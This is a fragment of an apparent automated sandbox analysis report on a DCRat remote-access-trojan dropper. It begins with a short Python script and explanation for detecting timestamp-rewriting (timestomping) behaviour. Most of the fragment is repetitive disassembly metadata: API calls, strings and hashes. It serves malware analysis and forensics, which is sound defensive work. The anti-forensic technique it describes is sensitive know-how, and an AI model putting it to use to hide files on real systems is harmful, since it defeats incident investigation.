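        "dwDesiredAccess": "?" if access is None else decode_mask(access, GENERIC_ACCESS),
        "dwShareMode": "?" if share is None else decode_mask(share, SHARE_MODE),
        "dwCreationDisposition": "?" if disp is None else DISPOSITION.get(disp, f"0x{disp:X}"),
        "dwFlagsAndAttributes": "?" if flags is None else decode_mask(flags, FLAGS_ATTRS),
    }


def rewrites_timestamps(calls: List[Call]) -> bool:
    """True when a CreateFile with write access is followed, in listed order, by
    SetFileTime and then CloseHandle: the routine rewrites the $STANDARD_INFORMATION
    timestamps of whatever it opens."""
    opened_for_write = set_time = False
    for c in calls:
        if (c.api in ("CreateFileW", "CreateFileA") and len(c.args) > 1
                and c.args[1] is not None and c.args[1] & 0x40000000):
            opened_for_write = True
        elif c.api == "SetFileTime" and opened_for_write:
            set_time = True
        elif c.api == "CloseHandle" and set_time:
            return True
    return False


if __name__ == "__main__":
    parsed = parse_calls(REPORT_LINES)
    for c in parsed:
        if c.api.startswith("CreateFile"):
            print(f"{c.ref:08X} {c.api}: {decode_createfile(c)}")
    print("rewrites timestamps:", rewrites_timestamps(parsed))
```

For both CreateFileW calls the decode gives GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING and FILE_FLAG_BACKUP_SEMANTICS; that flag is what CreateFile requires to return a handle to a directory, so the routine can stamp directories as well as files. Because SetFileTime then rewrites the $STANDARD_INFORMATION timestamps, the modification times of anything this routine touched on disk do not establish when it was written; use the $FILE_NAME timestamps in the MFT or the USN journal to reconstruct drop time.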
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,004B91E0,?,00000000,?,00000001,?,?,00000001,004B91E0,?), ref: 004BC9D5
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004BCA5E
                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004B6CBE,?), ref: 004BCA70
                                                                                                                        • __freea.LIBCMT ref: 004BCA79
                                                                                                                          • Part of subcall function 004B8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BCA2C,00000000,?,004B6CBE,?,00000008,?,004B91E0,?,?,?), ref: 004B8E38
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2652629310-0
                                                                                                                        • Opcode ID: ca6f382902c40912baa26b4ec6f3c2e8418fd51c216169e4cfd4dc76bb1bdba1
                                                                                                                        • Instruction ID: 6807e83dc33487605d81dddedfaa05e3cdfc2672cdee050cd8297b066608f830
                                                                                                                        • Opcode Fuzzy Hash: ca6f382902c40912baa26b4ec6f3c2e8418fd51c216169e4cfd4dc76bb1bdba1
                                                                                                                        • Instruction Fuzzy Hash: 0C31B072A0020AABDF25DF65CCC1EEF7BA5EB45310B04416AFC14E6251EB39DD50CBA4
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 004AA666
                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 004AA675
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004AA683
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 004AA691
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1035833867-0
                                                                                                                        • Opcode ID: 66af768b3ffc2d5b4c24415d3609fb76e6133078b3f06bc9f6c32b00e866557a
                                                                                                                        • Instruction ID: a319cc4e22d8e13d0b102212a2746ebca9b01591952b93fce7e8bb04d13c2d94
                                                                                                                        • Opcode Fuzzy Hash: 66af768b3ffc2d5b4c24415d3609fb76e6133078b3f06bc9f6c32b00e866557a
                                                                                                                        • Instruction Fuzzy Hash: 10E0EC31982721BBD6615F70AC0DBAB3F54EB15B53F014127FA0596194EF648610CBA9
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr
                                                                                                                        • String ID: .lnk$dJ
                                                                                                                        • API String ID: 2691759472-862619046
                                                                                                                        • Opcode ID: bc6f4c2e936341dd4eb5268612834b663299da7f0ff1519406712bd8c8492916
                                                                                                                        • Instruction ID: 6816e714b3711c55559553ebf5c592b18455a8610f61d521382501c6702a1b00
                                                                                                                        • Opcode Fuzzy Hash: bc6f4c2e936341dd4eb5268612834b663299da7f0ff1519406712bd8c8492916
                                                                                                                        • Instruction Fuzzy Hash: 00A15F72C001299ADF24DBA08D45EFB73FCAF55304F0885E7B50AE7141EE389A858B69
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 004975E3
                                                                                                                          • Part of subcall function 004A05DA: _wcslen.LIBCMT ref: 004A05E0
                                                                                                                          • Part of subcall function 0049A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0049A598
                                                                                                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0049777F
                                                                                                                          • Part of subcall function 0049A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0049A325,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A501
                                                                                                                          • Part of subcall function 0049A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0049A325,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A532
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                        • String ID: :
                                                                                                                        • API String ID: 3226429890-336475711
                                                                                                                        • Opcode ID: 52073a4601031cf93266441daeecdd320c197ba25b1901aef6bd2c27b2855201
                                                                                                                        • Instruction ID: 9d512eafada60d528c4cedba1e034ca995dc71e64ae9856dd5f258321aa09aaf
                                                                                                                        • Opcode Fuzzy Hash: 52073a4601031cf93266441daeecdd320c197ba25b1901aef6bd2c27b2855201
                                                                                                                        • Instruction Fuzzy Hash: AE419071800158A9EF25EB65CC59EEFBB78AF51304F0080FFB605A2192DB785F85CB69
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: _wcschr
• String ID: *
• API String ID: 2691759472-163128923
• Opcode ID: eec6b0c0ac14c81eb7c9846dc6ae13ecf87d2f5cc818caff4d23694ab125f373
• Instruction ID: 61b9ecadd6535cd0ad7e100ef211a320b9151dd7840e6c22ccaf3674bec6494e
• Opcode Fuzzy Hash: eec6b0c0ac14c81eb7c9846dc6ae13ecf87d2f5cc818caff4d23694ab125f373
• Instruction Fuzzy Hash: FD3116221443119A9E30EE55BB0267B7BE4DF94B14B15813FFD8447243E76D8C42B2EA
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: _wcslen
• String ID: }
• API String ID: 176396367-4239843852
• Opcode ID: 731f91e679ba86f575d9aacf6327a422988d3db00526ecd6149ab5cc04fce725
• Instruction ID: 0c6e468c1c3a6d37ade953cfe31db01daf13afbb80485f4caa9fb012d75df6a5
• Opcode Fuzzy Hash: 731f91e679ba86f575d9aacf6327a422988d3db00526ecd6149ab5cc04fce725
• Instruction Fuzzy Hash: C621CF629043066ADB31AA65D845AABB3DCDFA6758F04042FF54083243EB6CDD4883FA
APIs
  • Part of subcall function 0049F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0049F2E4
  • Part of subcall function 0049F2C5: GetProcAddress.KERNEL32(004D81C8,CryptUnprotectMemory), ref: 0049F2F4
• GetCurrentProcessId.KERNEL32(?,?,?,0049F33E), ref: 0049F3D2
Strings
• CryptProtectMemory failed, xrefs: 0049F389
• CryptUnprotectMemory failed, xrefs: 0049F3CA
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: AddressProc$CurrentProcess
• String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
• API String ID: 2190909847-396321323
• Opcode ID: fad87aedda45d9f0e98b645e548ef54e43177dca53b8ce2f7f1e4b25355146e7
• Instruction ID: b75850e00304c90afd2740a8305df19b992b85694f6d5e6cc9b19b219e2cf7db
• Opcode Fuzzy Hash: fad87aedda45d9f0e98b645e548ef54e43177dca53b8ce2f7f1e4b25355146e7
• Instruction Fuzzy Hash: 25110031601229ABEF25AF26DC45A6F3F54EF00724B14817BFC05DB351DA3C9E0A869D
APIs
• CreateThread.KERNEL32(00000000,00010000,004A1160,?,00000000,00000000), ref: 004A1043
• SetThreadPriority.KERNEL32(?,00000000), ref: 004A108A
  • Part of subcall function 00496C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00496C54
  • Part of subcall function 00496DCB: _wcschr.LIBVCRUNTIME ref: 00496E0A
  • Part of subcall function 00496DCB: _wcschr.LIBVCRUNTIME ref: 00496E19
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
• String ID: CreateThread failed
• API String ID: 2706921342-3849766595
• Opcode ID: ba8a16b95505b0cb63a4821749fb5c33e53360a90c2c32b2c1bfa7709eeba7e6
• Instruction ID: 655a613217d43811252492898985b5a21f4054bb2f9d7a25e0396c0d0b49c630
• Opcode Fuzzy Hash: ba8a16b95505b0cb63a4821749fb5c33e53360a90c2c32b2c1bfa7709eeba7e6
• Instruction Fuzzy Hash: 720126B63043097BD3306E64AC51F7673A8EB52751F20003FFB82566A0CAA86884862C
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: _wcschr
• String ID: <9L$?*<>|"
• API String ID: 2691759472-3936930852
• Opcode ID: 46b87eb3c7f2aba75622156889eacc472c7f9b22c7a69783c43253cf01ad0f42
• Instruction ID: bf93300ebc977ddfa48b6e264e7c0f30fc3c7618deffac6c7c23b038c3a8df1e
• Opcode Fuzzy Hash: 46b87eb3c7f2aba75622156889eacc472c7f9b22c7a69783c43253cf01ad0f42
• Instruction Fuzzy Hash: 6AF0D157A85301C5DF302EA89981733B7E4EF95320F34482FE5C4C73C2E6A988C0826D
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: _wcslen
• String ID: Software\WinRAR SFX$J
• API String ID: 176396367-750066849
• Opcode ID: bb43f80c48922031492da068d7759a7e76b0501e7f095b2db9116a477dcdb1bf
• Instruction ID: 0093ecf13c9a404ae714249e154f2a8889476d649826989f3b8c7d249515d57d
• Opcode Fuzzy Hash: bb43f80c48922031492da068d7759a7e76b0501e7f095b2db9116a477dcdb1bf
• Instruction Fuzzy Hash: 86017171900118BADB219B51DC09FDB7F7CEB15355F000067B54A910A0DBB49B98C6F9
APIs
  • Part of subcall function 0049C29A: _wcslen.LIBCMT ref: 0049C2A2
  • Part of subcall function 004A1FDD: _wcslen.LIBCMT ref: 004A1FE5
  • Part of subcall function 004A1FDD: _wcslen.LIBCMT ref: 004A1FF6
  • Part of subcall function 004A1FDD: _wcslen.LIBCMT ref: 004A2006
  • Part of subcall function 004A1FDD: _wcslen.LIBCMT ref: 004A2014
  • Part of subcall function 004A1FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0049B371,?,?,00000000,?,?,?), ref: 004A202F
  • Part of subcall function 004AAC04: SetCurrentDirectoryW.KERNELBASE(?,004AAE72,C:\Users\user\Desktop,00000000,004D946A,00000006), ref: 004AAC08
• _wcslen.LIBCMT ref: 004AAE8B
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: _wcslen$CompareCurrentDirectoryString
• String ID: <J$C:\Users\user\Desktop
• API String ID: 521417927-1902080862
• Opcode ID: ee2c8bb831f5f039621699663ca7e3d2bcd7d9b66a74749644b66454715e01fc
• Instruction ID: ea300d349391d596e2aa04036bead05adfaacfd9454370d7770b069a63b747a7
• Opcode Fuzzy Hash: ee2c8bb831f5f039621699663ca7e3d2bcd7d9b66a74749644b66454715e01fc
• Instruction Fuzzy Hash: 6A017171D40218A9DF10ABA6DD0AEDF73BCAF19308F00046BF505E3192E7BC9654CBA9
APIs
  • Part of subcall function 004B97E5: GetLastError.KERNEL32(?,004D1030,004B4674,004D1030,?,?,004B3F73,00000050,?,004D1030,00000200), ref: 004B97E9
  • Part of subcall function 004B97E5: _free.LIBCMT ref: 004B981C
  • Part of subcall function 004B97E5: SetLastError.KERNEL32(00000000,?,004D1030,00000200), ref: 004B985D
  • Part of subcall function 004B97E5: _abort.LIBCMT ref: 004B9863
• _abort.LIBCMT ref: 004BBB80
• _free.LIBCMT ref: 004BBBB4
Strings
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: ErrorLast_abort_free
• String ID: pL
• API String ID: 289325740-1374626527
                                                                                                                        • Opcode ID: 9d1a5426a0fa2b40a327411ba291062ba83c30272939f5efeda04fde518ce42f
                                                                                                                        • Instruction ID: 3384798dc2c6ccfd2446b4c1b0df7841a085203738e61dd0ad743c1447a645d3
                                                                                                                        • Opcode Fuzzy Hash: 9d1a5426a0fa2b40a327411ba291062ba83c30272939f5efeda04fde518ce42f
                                                                                                                        • Instruction Fuzzy Hash: 8E01A131D046219BCB61AF5AC801A9EB7A0FB04724B14011FE92467795CBBD7D01CFED
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Malloc
                                                                                                                        • String ID: (J$ZJ
                                                                                                                        • API String ID: 2696272793-3263590397
                                                                                                                        • Opcode ID: 95748433cd52622f76c079b93b42bb5c10004296b2fff45ff6b11d1f99cf2ece
                                                                                                                        • Instruction ID: f899e6749f9499284b7abd10473e1ce642139158fac4167ff4a0ca1d8fa54216
                                                                                                                        • Opcode Fuzzy Hash: 95748433cd52622f76c079b93b42bb5c10004296b2fff45ff6b11d1f99cf2ece
                                                                                                                        • Instruction Fuzzy Hash: BC0169B6600108FF9F059FB0DC49CEEBBADEF19345700416AB906D7220EB31AA44DBA4
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004BBF30: GetEnvironmentStringsW.KERNEL32 ref: 004BBF39
                                                                                                                          • Part of subcall function 004BBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004BBF5C
                                                                                                                          • Part of subcall function 004BBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004BBF82
                                                                                                                          • Part of subcall function 004BBF30: _free.LIBCMT ref: 004BBF95
                                                                                                                          • Part of subcall function 004BBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004BBFA4
                                                                                                                        • _free.LIBCMT ref: 004B82AE
                                                                                                                        • _free.LIBCMT ref: 004B82B5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                        • String ID: 0"O
                                                                                                                        • API String ID: 400815659-2600150691
                                                                                                                        • Opcode ID: 7b87134a766005e6104eaf441b7bc008ae5ab7d39120aab583fdc82cd7b4bdd8
                                                                                                                        • Instruction ID: 6d5b9288b41d3893cc73f1fcaeccfa39fd7b75af796cbd4317b687671b0ba367
                                                                                                                        • Opcode Fuzzy Hash: 7b87134a766005e6104eaf441b7bc008ae5ab7d39120aab583fdc82cd7b4bdd8
                                                                                                                        • Instruction Fuzzy Hash: 6AE0652360695245A669327B7C426FB160C8FD133CB5502AFF610D61D3DE9C8803C9BF
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,004A1206,?), ref: 004A0FEA
                                                                                                                        • GetLastError.KERNEL32(?), ref: 004A0FF6
                                                                                                                          • Part of subcall function 00496C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00496C54
                                                                                                                        Strings
                                                                                                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 004A0FFF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                        • API String ID: 1091760877-2248577382
                                                                                                                        • Opcode ID: e94f35b64239cb795c2a92976469f11af97109495ef4e8efbf37efc66acd7192
                                                                                                                        • Instruction ID: bb1488e5571efb34992fbe4900cad5c2e79750d9cba5390750ddb79316e914c5
                                                                                                                        • Opcode Fuzzy Hash: e94f35b64239cb795c2a92976469f11af97109495ef4e8efbf37efc66acd7192
                                                                                                                        • Instruction Fuzzy Hash: D5D02B3260812036CA2037295D05D7F3C049B62332F21472BF538506FACB1C0981429D
